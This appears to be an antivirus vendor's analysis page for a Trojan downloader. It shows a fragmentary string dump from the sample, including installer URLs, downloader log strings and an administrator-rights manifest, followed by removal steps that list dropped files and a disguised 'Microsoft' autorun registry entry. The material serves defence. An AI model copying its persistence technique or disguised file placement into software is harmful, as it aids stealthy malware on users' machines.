" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:4B92474C9E9011E39814DABADC782ABD" xmpMM:DocumentID="xmp.did:4B92474D9E9011E39814DABADC782ABD"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:4B92474A9E9011E39814DABADC782ABD" stRef:documentID="xmp.did:4B92474B9E9011E39814DABADC782ABD"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:2F6B0F666F5311E2B37994BB203073E2" xmpMM:DocumentID="xmp.did:2F6B0F676F5311E2B37994BB203073E2"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2F6B0F646F5311E2B37994BB203073E2" stRef:documentID="xmp.did:2F6B0F656F5311E2B37994BB203073E2"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>S
fiTXtXML:com.adobe.xmp
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:11DAFFFF7B6EE21188A8A102A34B470D" xmpMM:DocumentID="xmp.did:FF49499E6F5111E2A669A1961A88CA63" xmpMM:InstanceID="xmp.iid:FF49499D6F5111E2A669A1961A88CA63" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:E90FAD22AE6EE21188A8A102A34B470D" stRef:documentID="xmp.did:11DAFFFF7B6EE21188A8A102A34B470D"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>)
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:11DAFFFF7B6EE21188A8A102A34B470D" xmpMM:DocumentID="xmp.did:1D7D666F7BFE11E2BD6AA411B2620E95" xmpMM:InstanceID="xmp.iid:1D7D666E7BFE11E2BD6AA411B2620E95" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:FB83E61E3E6FE211AA95A89280EC434B" stRef:documentID="xmp.did:11DAFFFF7B6EE21188A8A102A34B470D"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:11DAFFFF7B6EE21188A8A102A34B470D" xmpMM:DocumentID="xmp.did:DABEBB0F7BFD11E2AB119E5A44D0BEB7" xmpMM:InstanceID="xmp.iid:DABEBB0E7BFD11E2AB119E5A44D0BEB7" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:E8C996E5897AE21186448A62D3D64C02" stRef:documentID="xmp.did:11DAFFFF7B6EE21188A8A102A34B470D"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:11DAFFFF7B6EE21188A8A102A34B470D" xmpMM:DocumentID="xmp.did:2720BC0E7BFF11E2BBE3A94C3F17A90B" xmpMM:InstanceID="xmp.iid:2720BC0D7BFF11E2BBE3A94C3F17A90B" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:60EEDFAFD57BE2118007B0063BB2D839" stRef:documentID="xmp.did:11DAFFFF7B6EE21188A8A102A34B470D"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>r
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:11DAFFFF7B6EE21188A8A102A34B470D" xmpMM:DocumentID="xmp.did:586FB3776F5311E29AF5F39FDCE96E0C" xmpMM:InstanceID="xmp.iid:586FB3766F5311E29AF5F39FDCE96E0C" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:DE459A23AD6EE21188A8A102A34B470D" stRef:documentID="xmp.did:11DAFFFF7B6EE21188A8A102A34B470D"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>'
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:8BE655707A5E11E2A6F3F91090C2A9F8" xmpMM:DocumentID="xmp.did:8BE655717A5E11E2A6F3F91090C2A9F8"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:8BE6556E7A5E11E2A6F3F91090C2A9F8" stRef:documentID="xmp.did:8BE6556F7A5E11E2A6F3F91090C2A9F8"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:1BC804D76C6D11E399F1ECB53FDD5265" xmpMM:DocumentID="xmp.did:1BC804D86C6D11E399F1ECB53FDD5265"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:1BC804D56C6D11E399F1ECB53FDD5265" stRef:documentID="xmp.did:1BC804D66C6D11E399F1ECB53FDD5265"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>x,
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:8BD4B6966C6E11E39AA9E7C5479B4D87" xmpMM:DocumentID="xmp.did:8BD4B6976C6E11E39AA9E7C5479B4D87"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:8BD4B6946C6E11E39AA9E7C5479B4D87" stRef:documentID="xmp.did:8BD4B6956C6E11E39AA9E7C5479B4D87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>A
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:EAB2B8459E9311E3A802CF8194EE1EBF" xmpMM:DocumentID="xmp.did:EAB2B8469E9311E3A802CF8194EE1EBF"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:EAB2B8439E9311E3A802CF8194EE1EBF" stRef:documentID="xmp.did:EAB2B8449E9311E3A802CF8194EE1EBF"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
.ve\@
l.upzY
<requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel>
6'7J78`8}8
< <$<(<,<0<
7 7$7(7,707
8$8(8,808^8|8
=$=*=2=@=\=
; ;$;(;,;0;4;8;<;\<
9 9$9(9:9
3?3`3{3
4O4`4{4
7’9C9H9M9':G:
5!5'535@5
99p9v9
1 202[2`2
=$=(=,=0=4=8=<=@=
>(>/>4>8><>]>
>&?,?0?4?8?
3,52585{5
0094989
; ;$;(;,;0;4;8;
6$6<6@6\6`6
Eiexplore.exe
E-%%
1.0.0.0
HTTP/1.1
hXXp://en.browser.baidu.com/report/install.cgi?
SparkMiniInstall.ini
JhXXp://en.browser.baidu.com/query/package.xml?
Jspark.exe
Software\Microsoft\Windows\CurrentVersion\App Paths\Spark.exe
/ChannelLaunchURL
Advapi32.dll
%s 0%%
%s -%%
/ChannelLaunchURL=
..\spark_install.exe
spark_install.exe
en.browser.baidu.com/license.html
en.browser.baidu.com/policy.html
en.browser.baidu.com
id.browser.baidu.com/license.html
id.browser.baidu.com/policy.html
id.browser.baidu.com
Portugu
br.browser.baidu.com/license.html
br.browser.baidu.com/policy.html
br.browser.baidu.com
th.browser.baidu.com/license.html
th.browser.baidu.com/policy.html
th.browser.baidu.com
%d.d.d-d:d:d
%s, Call DownloadOver, percent=%d, RetCode=%d
%s, DownloadRet = %d, costtime = f
%s, costtime = f
%s, Exception
%s, Start New Channel : %d
%s, limit download speed
%s, Error : Url or Path NULL
%s, Error : Url or Path empty
%s First DestPath = %s
%s URL = %s
%s, Error : work thread start
%s, Error : Path can't write
%s, Error : CreateDirectory fail
%s, Error : Path no legal
%s, Error : Re In
F%s, End
%s, Start
X-X-x-XX-XXXXXX
%s, GetLastError=%d
%s, percent=%d, Speed=%I64d
%s, want to StopThread
%s, StartNewThread : %d
%s, cookie = %d
%s, It should not happen
%s, Stop Thread
%s, Fail download : retry times = %d
%s, Fail more than max retry time!!!
%s, Network error
%s, CTimerStartChannelTask Stop Thread
%s, Stop a Channel : %d
%s, CDownloadPartOverTask StopNewThread
%s, Respone = %d
%s, curl_easy_perform = %d
%s No Valid Dest Path Error
%s No ReuseSameFile : RemoteFileSize no same
%s No ReuseSameFile : configured size big than remote file
%s No ReuseSameFile : channel num error
%s No ReuseSameFile
%s url md5 = %s
%s, First Start StartNewThread : %d
%s, Call DownloadStart
%s, MemMap UniqueID:%s
%s Final DestPath = %s
%s Big File No NTFS disk
%s, DeleteFile GetLastError=%d
%s No Support Range
%s remote size = %I64d
%s, GetRemoteFileSize : Retry = %d
%s, GetNetFileSize Respone = %d
%s, GetNetFileSize curl_easy_perform = %d
%s Proxy: %s
%s IE Proxy: %s
%s, Network Error
C%s, no gnet file
%s gnet info: %s
.gnet
%s, cookie:%d, responsecode:%d
%s, mapFile Write Error
%s, cookie:%d, head:%s
127.0.0.1
https=
http=
KERNEL32.DLL
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
mscoree.dll
WUSER32.DLL
\Baidu\Common\I18N\conf.db
%s(%d)%s
\test4822FBB5_0309_420f_9DA2_FA5B8B854947.txt
%dddddd
XXxXXXXXXXX
\/:*?"<>|
SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}
SYSTEM\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
\\.\PhysicalDrive%d
\\.\Scsi%d:
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\4.62521202070639\bdMiniDownloaderEG_MENAON-Mini_32_3313.exe
1.0.0.2
bdMiniDownload.exe


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:1600
    Setup.exe:1688
    doc.exe:640
    Index.exe:1204

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temp\Setup.exe (8801 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Index.exe (9361 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\autB3.tmp (4161 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\autB2.tmp (5737 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@menaon[1].txt (212 bytes)
    %Documents and Settings%\%current user%\Cookies\index.dat (2120 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\4.62521202070639\bdMiniDownloaderEG_MENAON-Mini_32_3313.exe (388 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@somdows[1].txt (214 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\bdMiniDownloaderEG_MENAON-Mini_32_3313[1].exe (1969 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\4.62521202070639\3.92826783796772.txt (371 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\5[1].txt (232 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1.11824613064528\1.90694312099367.txt (232 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@cpa-install[1].txt (221 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Application Data\Google\int\one.exe (117004 bytes)
    %Documents and Settings%\%current user%\Application Data\Google\int\doc.exe (117724 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\updater[1].exe (443897 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\google[1].exe (445697 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "Microsoft" = "%Documents and Settings%\%current user%\Application Data\Google\int\one.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.